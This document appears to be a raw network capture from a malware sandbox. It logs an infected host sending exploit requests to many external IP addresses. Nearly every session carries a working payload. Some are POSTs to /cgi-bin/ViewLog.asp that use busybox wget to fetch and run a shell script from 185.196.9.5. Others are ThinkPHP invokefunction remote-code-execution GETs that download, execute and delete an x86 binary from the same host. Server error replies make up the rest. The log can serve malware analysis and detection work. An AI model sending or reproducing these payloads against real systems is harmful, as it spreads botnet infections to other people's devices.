284	192.168.2.15	47070	94.238.153.217	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:11.876418114 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:12.454072952 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:13.574244022 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
285	192.168.2.15	51172	31.177.84.17	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:11.915934086 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
286	192.168.2.15	57318	94.122.199.120	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:11.916207075 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
287	192.168.2.15	59212	94.123.32.174	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:12.496747017 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
288	192.168.2.15	33824	95.85.216.8	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:12.575077057 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:12.774960041 CET	403	IN	HTTP/1.1 403 Forbidden Date: Sun, 25 Feb 2024 18:03:12 GMT Server: nginx X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
289	192.168.2.15	33990	95.128.110.146	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:12.601505041 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:12.815550089 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:03:12 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
290	192.168.2.15	42260	95.205.53.195	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:12.605166912 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:12.865166903 CET	36	IN	HTTP/1.1 403 Forbidden
Feb 25, 2024 19:03:12.881011009 CET	221	IN	Data Raw: 53 65 72 76 65 72 3a 20 61 6c 70 68 61 70 64 2f 32 2e 31 2e 38 0d 0a 44 61 74 65 3a 20 53 75 6e 20 46 65 62 20 32 35 20 31 39 3a 30 33 3a 31 32 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e Data Ascii: Server: alphapd/2.1.8Date: Sun Feb 25 19:03:12 2024Pragma: no-cacheCache-Control: no-cacheContent-type: text/htmlContent-length: 62<html><body><h1>The request is forbidden.</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
291	192.168.2.15	45828	88.184.23.134	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:12.751460075 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:12.928039074 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:12 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
292	192.168.2.15	59290	95.128.4.104	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:12.766463995 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:12.957736015 CET	450	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 345 Connection: close Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
293	192.168.2.15	55106	85.122.231.21	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:12.837564945 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
294	192.168.2.15	48732	31.208.115.60	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:12.949641943 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:13.168421984 CET	561	IN	HTTP/1.1 404 Not Found Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Content-Type Content-Type: text/html Content-Length: 345 Date: Sun, 25 Feb 2024 18:03:11 GMT Server: WebServer Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
295	192.168.2.15	45292	88.227.38.117	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:12.988276005 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
296	192.168.2.15	55752	88.221.46.16	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:12.996841908 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:13.194319963 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:03:13 GMT Date: Sun, 25 Feb 2024 18:03:13 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 38 65 32 31 31 37 26 23 34 36 3b 31 37 30 38 38 38 34 31 39 33 26 23 34 36 3b 32 32 62 37 63 37 33 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.b8e2117.1708884193.22b7c731</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
297	192.168.2.15	51244	88.221.30.95	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:13.008733988 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:13.217964888 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:03:13 GMT Date: Sun, 25 Feb 2024 18:03:13 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 37 35 65 38 63 34 66 26 23 34 36 3b 31 37 30 38 38 38 34 31 39 33 26 23 34 36 3b 65 32 66 65 63 62 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.475e8c4f.1708884193.e2fecbf</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
298	192.168.2.15	56542	88.85.252.35	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:13.112715006 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:13.380904913 CET	704	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:12 GMT Server: Apache/2.4.58 Content-Length: 416 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: cookiesession1=678B28C9FC848284B76BF1008EBDC68D;Expires=Mon, 24 Feb 2025 18:03:13 GMT;Path=/;HttpOnly Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 53 65 72 76 65 72 20 61 74 20 61 75 70 61 79 2e 63 6f 6d 2e 73 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 Server at aupay.com.sa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
299	192.168.2.15	56644	95.100.231.150	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:13.642586946 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:13.990170956 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:14.822165966 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
